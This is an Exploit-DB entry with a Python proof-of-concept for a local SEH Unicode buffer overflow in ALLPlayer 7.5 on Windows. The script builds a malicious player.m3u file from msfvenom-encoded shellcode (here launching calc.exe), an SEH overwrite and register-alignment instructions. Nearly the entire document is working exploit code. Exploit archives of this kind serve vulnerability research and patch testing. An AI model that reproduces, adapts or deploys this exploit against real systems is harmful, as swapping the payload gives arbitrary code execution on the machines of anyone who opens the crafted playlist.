ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)

EDB-ID:

43179

CVE:

N/A


Author:

sickness

Type:

local


Platform:

Windows

Date:

2017-11-25


#!/usr/bin/python
# Tested on: Windows 10 Professional (x86)
# Exploit for previous version: https://www.exploit-db.com/exploits/42455/ (Seems they haven't patched the vulnerability at all :D)

# msfvenom -p windows/exec CMD="calc.exe" -e x86/unicode_mixed BufferRegister=EAX -f python
shellcode =  ""
shellcode += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
shellcode += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
shellcode += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
shellcode += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
shellcode += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
shellcode += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
shellcode += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
shellcode += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
shellcode += "\x47\x42\x39\x75\x34\x4a\x42\x39\x6c\x5a\x48\x33\x52"
shellcode += "\x69\x70\x69\x70\x6d\x30\x31\x50\x53\x59\x79\x55\x30"
shellcode += "\x31\x75\x70\x6f\x74\x72\x6b\x42\x30\x6e\x50\x52\x6b"
shellcode += "\x4e\x72\x7a\x6c\x52\x6b\x4e\x72\x6a\x74\x44\x4b\x71"
shellcode += "\x62\x6c\x68\x7a\x6f\x34\x77\x50\x4a\x6f\x36\x30\x31"
shellcode += "\x4b\x4f\x74\x6c\x6d\x6c\x43\x31\x63\x4c\x7a\x62\x6e"
shellcode += "\x4c\x4d\x50\x47\x51\x66\x6f\x6c\x4d\x79\x71\x55\x77"
shellcode += "\x68\x62\x6a\x52\x31\x42\x31\x47\x42\x6b\x6e\x72\x6c"
shellcode += "\x50\x64\x4b\x30\x4a\x4d\x6c\x62\x6b\x6e\x6c\x4c\x51"
shellcode += "\x63\x48\x5a\x43\x6f\x58\x4b\x51\x48\x51\x72\x31\x62"
shellcode += "\x6b\x71\x49\x4d\x50\x59\x71\x46\x73\x72\x6b\x6e\x69"
shellcode += "\x7a\x78\x48\x63\x6c\x7a\x61\x39\x44\x4b\x6c\x74\x64"
shellcode += "\x4b\x4b\x51\x37\x66\x70\x31\x69\x6f\x54\x6c\x39\x31"
shellcode += "\x46\x6f\x5a\x6d\x79\x71\x58\x47\x4f\x48\x69\x50\x53"
shellcode += "\x45\x6c\x36\x6d\x33\x43\x4d\x49\x68\x6d\x6b\x61\x6d"
shellcode += "\x6c\x64\x51\x65\x58\x64\x72\x38\x72\x6b\x4f\x68\x4e"
shellcode += "\x44\x39\x71\x46\x73\x4f\x76\x52\x6b\x4c\x4c\x30\x4b"
shellcode += "\x34\x4b\x70\x58\x6d\x4c\x4d\x31\x58\x53\x64\x4b\x49"
shellcode += "\x74\x64\x4b\x6b\x51\x38\x50\x75\x39\x6e\x64\x4b\x74"
shellcode += "\x6e\x44\x31\x4b\x51\x4b\x6f\x71\x62\x39\x4f\x6a\x70"
shellcode += "\x51\x49\x6f\x47\x70\x31\x4f\x51\x4f\x31\x4a\x54\x4b"
shellcode += "\x6d\x42\x38\x6b\x34\x4d\x61\x4d\x30\x6a\x79\x71\x54"
shellcode += "\x4d\x74\x45\x77\x42\x79\x70\x4d\x30\x69\x70\x30\x50"
shellcode += "\x51\x58\x70\x31\x72\x6b\x42\x4f\x42\x67\x6b\x4f\x57"
shellcode += "\x65\x35\x6b\x68\x70\x47\x45\x34\x62\x4f\x66\x62\x48"
shellcode += "\x73\x76\x44\x55\x77\x4d\x43\x6d\x79\x6f\x6a\x35\x6d"
shellcode += "\x6c\x7a\x66\x31\x6c\x69\x7a\x73\x50\x4b\x4b\x4b\x30"
shellcode += "\x31\x65\x4a\x65\x57\x4b\x6d\x77\x4c\x53\x64\x32\x50"
shellcode += "\x6f\x71\x5a\x4b\x50\x51\x43\x6b\x4f\x49\x45\x50\x63"
shellcode += "\x31\x51\x50\x6c\x72\x43\x6e\x4e\x71\x55\x74\x38\x31"
shellcode += "\x55\x6b\x50\x41\x41"

buffer  = "http://"
buffer += "\x41" * 301
buffer += "\x61\x41"            # POPAD (NSEH)
buffer += "\x0f\x47"            # P/P/R (SEH)
buffer += "\x56\x41"            # PUSH ESI
buffer += "\x58\x41"            # POP EAX
buffer += "\x05\x07\x01\x41"    # ADD EAX, 0x1000700
buffer += "\x2d\x04\x01\x41"    # SUB EAX, 0x1000400
buffer += "\x50\x41"            # PUSH EAX
buffer += "\xc3"                # RET
buffer += "\x41" * 45
buffer += shellcode
buffer += "\x41" * (1500 - len(buffer))

f=open("player.m3u",'wb')
f.write(buffer)
f.close()